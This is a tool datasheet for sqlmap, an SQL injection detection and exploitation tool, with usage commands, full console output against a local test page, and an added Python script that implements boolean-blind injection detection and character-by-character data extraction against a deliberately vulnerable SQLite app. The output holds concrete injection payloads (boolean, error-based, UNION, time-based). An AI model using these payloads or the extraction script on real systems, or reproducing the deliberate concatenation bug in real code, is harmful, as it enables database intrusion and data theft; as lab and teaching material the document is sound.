sqlmap
Phase(s):
Primary: Exploitation.
Secondary: N/A.
Description:
Tool that detects and exploits SQL injection vulnerabilities in web applications, with support for multiple database management systems.
Objective:
- Detect SQL injection vulnerabilities.
- Exploit SQL injection vulnerabilities.
Features:
Supported technologies: Web application (HTTP/HTTPS).
Operative mode: Active.
Detect SQL injection vulnerabilities.
- Identifies parameters vulnerable to SQL injection in web applications by running multiple configurable injection tests ("payloads": boolean-based blind, error-based, UNION query and time-based blind, among others).
- Tests parameters sent via the GET and POST methods.
- Fingerprints the database management system behind the web application in order to focus the tests:
- MySQL
- Oracle
- PostgreSQL
- MS SQL Server
- MS Access
- IBM DB2
- SQLite
- Firebird
- Sybase
- SAP MaxDB
Exploit SQL injection vulnerabilities.
- Enumerates and extracts database contents, including users, databases, tables, columns and the records they hold, among others.
- Can execute functions on the database server (subject to the privileges of the database user):
- Operating system commands.
- Creating and deleting files.
- Reading registry (Windows).
Reports:
Output reports: ✔
Output in TXT, XML and HTML format, including:
- SQLite file: the results of the database extraction, stored locally.
- "log.txt" file: the successful injections and the data obtained.
- "targets" file: information on the scanned targets.
Basic usage:
Test and exploit a suspected SQL injection. The following command starts testing the specified parameter of the web application.
./sqlmap.py -u 'http://127.0.0.1:9001/miaplicacion/page.jsp?busqueda=info' -p busqueda --output-dir='[Directory]'
Where:
• -u: URL of the web application.
• -p: parameter suspected of being vulnerable to SQL injection.
• --output-dir: directory where the results are written.
The tool begins by testing whether the parameter is susceptible to SQL injection and by fingerprinting the database management system in order to focus the tests.
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It
is the end user's responsibility to obey all applicable local, state and federal laws. Developers
assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:00:00
[00:00:00] [INFO] testing connection to the target URL
[00:00:00] [INFO] heuristics detected web page charset 'ISO-8859-2'
[00:00:00] [INFO] testing if the target URL is stable. This can take a couple of seconds
[00:00:00] [INFO] target URL is stable
[00:00:00] [WARNING] reflective value(s) found and filtering out
[00:00:00] [INFO] heuristic (basic) test shows that GET parameter 'busqueda' might be injectable (possible DBMS: 'MySQL')
If the database management system is identified, the tool offers to restrict the tests to that DBMS; here 'Y' was chosen to accept.
[00:00:00] [INFO] testing for SQL injection on GET parameter 'busqueda'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
The tool then runs its preloaded tests ("payloads") to identify the injection and the payload required to exploit it; when a test succeeds, the message ends in "injectable".
[00:00:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:00:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[00:00:00] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[00:00:00] [INFO] GET parameter 'busqueda' is 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable
[00:00:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:00:00] [INFO] GET parameter 'busqueda' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[00:00:00] [INFO] testing 'MySQL inline queries'
[00:00:00] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:00:00] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[00:00:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:00:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[00:00:00] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[00:00:00] [INFO] GET parameter 'busqueda' is 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
[00:00:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:00:00] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[00:00:00] [INFO] target URL appears to be UNION injectable with 5 columns
[00:00:00] [INFO] GET parameter 'busqueda' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[00:00:00] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
Based on the tests performed, the tool records the injection points found so that later operations can use them. It then offers to test the remaining parameters of the application; here 'N' was chosen to finish, after which it prints the successful tests together with the information gathered: operating system, web server and database management system.
GET parameter 'busqueda' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 74 HTTP(s) requests:
---
Place: GET
Parameter: busqueda
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: page.jsp?busqueda=-7808' OR (1013=1013)#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: page.jsp?busqueda=test' AND (SELECT 3338 FROM(SELECT COUNT(*),CONCAT(0x3a6866673a,(SELECT
(CASE WHEN (3338=3338) THEN 1 ELSE 0 END)),0x3a6866753a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Wkqc'='Wkqc
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: page.jsp?busqueda=test' UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x3a6866673a,0x4e4a7056657854754662,0x3a6866753a),NULL#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: page.jsp?busqueda=test' AND 4757=BENCHMARK(5000000,MD5(0x515a6f49)) AND 'BqjY'='BqjY
---
[00:00:00] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[00:00:00] [INFO] fetched data logged to text files under '/directorio/sqlmap/127.0.0.1'
[*] shutting down at 19:32:47
The tool stores the results in the specified directory, recording the injection points identified so that later runs can use them without repeating the initial detection.
The following command retrieves information from the database management system, in this case the name of the current database user.
./sqlmap.py -u 'http://127.0.0.1:9001/miaplicacion/page.jsp?busqueda=info' --output-dir='/security/sqlmap/' --current-user
Where:
• -u: URL of the web application.
• --output-dir: directory where the results are written.
• --current-user: retrieves the name of the database user.
The tool resumes from the stored session and, using the payload it already knows, retrieves the requested information from the database.
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It
is the end user's responsibility to obey all applicable local, state and federal laws. Developers
assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:34:13
[00:00:00] [INFO] resuming back-end DBMS 'mysql'
[00:00:00] [INFO] testing connection to the target URL
[00:00:00] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
…
[00:00:00] [INFO] fetching current user
current user: 'root@localhost'
[00:00:00] [INFO] fetched data logged to text files under '/directorio/sqlmap/127.0.0.1'
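The two runs above show sqlmap first deciding that 'busqueda' is boolean-based blind injectable and later pulling the current user through that same channel, one true/false question at a time. The following Python example is added here and is not part of this page or of sqlmap itself: it reproduces both steps against a constructed in-memory SQLite stand-in for page.jsp (the table names articulos and session_info and the sample rows are hypothetical, and SQLite's '-- ' comment replaces the '#' of the MySQL payload shown above). A true and a false OR condition are compared to decide injectability, then the length and each character of the user string are recovered by binary search, which is why the request count grows with the amount of data extracted.

```python
"""Boolean-based blind SQL injection, detection and extraction, in the style
of sqlmap, against a constructed in-memory SQLite target (added example)."""
import sqlite3


class VulnerableApp:
    """Constructed stand-in for page.jsp: the 'busqueda' parameter is
    concatenated into the SQL string on purpose, which is the bug sqlmap finds."""

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        cur = self.conn.cursor()
        cur.execute("CREATE TABLE articulos (id INTEGER PRIMARY KEY, titulo TEXT)")
        cur.executemany("INSERT INTO articulos (titulo) VALUES (?)",
                        [("info general",), ("informe anual",), ("contacto",)])
        # SQLite has no USER(); a one-row table (hypothetical) stands in for the
        # session user that sqlmap reported as 'root@localhost' above.
        cur.execute("CREATE TABLE session_info (current_user TEXT)")
        cur.execute("INSERT INTO session_info VALUES ('root@localhost')")
        self.conn.commit()
        self.requests = 0  # mirrors sqlmap's "total of N HTTP(s) requests"

    def page_jsp(self, busqueda):
        """Vulnerable handler: builds the query by string concatenation."""
        self.requests += 1
        sql = ("SELECT titulo FROM articulos WHERE titulo LIKE '%"
               + busqueda + "%' ORDER BY id")
        try:
            rows = self.conn.execute(sql).fetchall()
        except sqlite3.Error:
            return "<html><body>Error interno</body></html>"
        items = "".join("<li>%s</li>" % t for (t,) in rows)
        return ("<html><body><ul>%s</ul><p>%d resultados</p></body></html>"
                % (items, len(rows)))


def or_payload(condition):
    """Shape of the page's 'OR boolean-based blind' payload,
    -7808' OR (1013=1013)#, with SQLite's '-- ' in place of MySQL's '#'."""
    return "-7808' OR (%s)-- " % condition


def detect_boolean_blind(app):
    """sqlmap-style heuristic: the parameter is boolean-blind injectable when a
    true and a false condition yield different pages and neither is an error."""
    true_page = app.page_jsp(or_payload("1013=1013"))
    false_page = app.page_jsp(or_payload("1013=1014"))
    if "Error interno" in true_page or "Error interno" in false_page:
        return False
    return true_page != false_page


class BooleanBlindExtractor:
    """Answers yes/no questions about the database from page content only."""

    def __init__(self, app):
        self.app = app
        self.true_page = app.page_jsp(or_payload("1013=1013"))

    def ask(self, condition):
        # With the OR payload, a true condition returns every row (the
        # reference page); a false one returns no rows.
        return self.app.page_jsp(or_payload(condition)) == self.true_page

    def bisect(self, expr, lo=0, hi=255):
        """Recover the integer value of SQL expression `expr` with '> mid'
        questions: about 8 requests per value instead of up to 255."""
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask("%s > %d" % (expr, mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def extract_string(self, subquery):
        """First the length, as sqlmap does, then each character by its code."""
        length = self.bisect("length((%s))" % subquery)
        chars = []
        for i in range(1, length + 1):
            code = self.bisect("unicode(substr((%s), %d, 1))" % (subquery, i))
            chars.append(chr(code))
        return "".join(chars)


def current_user(app):
    """Equivalent of 'sqlmap --current-user' over the boolean-blind channel."""
    if not detect_boolean_blind(app):
        raise RuntimeError("parameter does not look boolean-blind injectable")
    extractor = BooleanBlindExtractor(app)
    return extractor.extract_string("SELECT current_user FROM session_info")


if __name__ == "__main__":
    app = VulnerableApp()
    print("current user:", current_user(app), "after", app.requests, "requests")
```

The request counter makes the cost of blind extraction visible: fourteen characters of user name cost well over a hundred requests, which is why sqlmap prefers UNION or error-based techniques when the same parameter supports them and falls back to the boolean or time-based channel only when it must.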
Resources:
Link: http://sqlmap.org
Author(s): Bernardo Damele A. G.
Miroslav Stampar
Contact: sqlmap-users@lists.sourceforge.net
License: (C) 2006-2013 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
GNU General Public License Version 2